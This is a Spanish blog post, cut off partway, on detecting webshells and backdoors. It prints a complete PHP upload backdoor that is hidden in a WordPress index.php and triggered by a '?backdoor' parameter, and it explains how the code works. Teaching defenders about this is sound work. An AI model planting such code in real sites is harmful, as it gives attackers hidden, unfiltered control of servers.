Detectando Webshells o Backdoors en Servidores Web
Jun02

Detectando Webshells o Backdoors en Servidores Web

Es muy común ya ver cientos de páginas web “Defaceadas” o “hackeadas” una y otra vez, en ocasiones vemos que los grupos que se dedican a esta labor de hacer de una u otra manera “Hacktivismo” o ya sea sólo por demostrar sus conocimientos, repiten targets recalcando la mala seguridad que implementan en dichos targets (objetivos-páginas web) pues esto se debe a que una vez que es vulnerado un servidor web como tal, se plantan las famosas BACKDOORS o PUERTAS TRACERAS – no es suficiente con activar el Back Up (copia de seguridad) que muy seguramente tenemos para en un caso de emergencia restablecer el funcionamiento como tal del aplicativo. La función de un Backdoor o puerta trasera, consiste en dejar un “hueco” por donde un atacante pueda volver a tomar control del servidor o página web sin problema alguno, a continuación les explicaré una de las Backdoors mas fáciles de implementar en PHP. Esta Backdoor es simplemente un UPLOADER creado en PHP pero está oculto dentro de un archivo del sitio afectado, para este ejemplo usaremos www.wordpress.com (no se emocionen esto es en un entorno controlado LOCALMENTE xD ) CÓDIGO : <?php if (isset($_GET['backdoor'])) { echo '<center> <form action="" method="post" enctype="multipart/form-data"> Seleccione el Archivo <input value="Examinar" name="archivo" type="file"> <input value="0xSubir" type="submit"></form></center>'; if (isset($_FILES['archivo'])) { $ar=$_FILES['archivo']['name']; if (copy($_FILES['archivo']['tmp_name'],$path . $_FILES['archivo']['name'])) { echo '<center><h3>Archivo Subido en <a href="'.$ar.'">'.$ar.'</a></h3></center>'; } elseif (move_uploaded_file($_FILES['archivo']['tmp_name'],$path . $_FILES['archivo']['name'])){ echo '<center><h3>Archivo Subido en <a href="'.$ar.'">'.$ar.'</a></h3></center>'; } else { echo '<center><h3>Error al Subir Archivo</h3></center>'; } } } ?> Paso a explicar como funciona esta Backdoor. Como podemos observar en if (isset($_GET['backdoor'])) { nos esta diciendo que si el valor enviado por GET es backdoor, entonces nos va a mostrar nuestro UPLOADER, obviamente esta programado sin ningún tipo de filtros. Para una mayor comprensión veamos el ejemplo en el entorno controlado: Usaré en esta oportunidad el CMS ya conocido como WordPress .. se puede observar el sitio en normal funcionamiento, vemos que hay un post de una entrevista a Chema Alonso la cual se publico en el blog de la comunidad r00tc0d3rs para los que quieran leerla Aquí el Link (http://r00tc0d3rs.org/pequena-entrevista-a-chema-alonso-el-maligno/). lastimosamente corrimos con tan mala suerte que hemos sido vulnerados por un atacante el cual ha logrado montar una SHELL WEB con tan mala suerte que ni cuenta nos dimos de cuando sucedió esto ya que el atacante en esta ocasión no hizo un DEFACEMENT solo vulnero y tiene control de nuestro sitio, para evitar ser descubierto decidió borrar la SHELL que había montado pero no sin antes plantar su Backdoor. Aquí podemos observar la backdoor plantada en el archivo index.php Aquí logramos observar la manera de...

Leer Más
Leer Más
Leer Más

Siguenos!

O Puedes Subscribete

ANTES DE

SALIRTE ...

NO TE

ARREPENTIRÁS

!Gracias¡

NO OLVIDES NUESTRAS REDES SOCIALES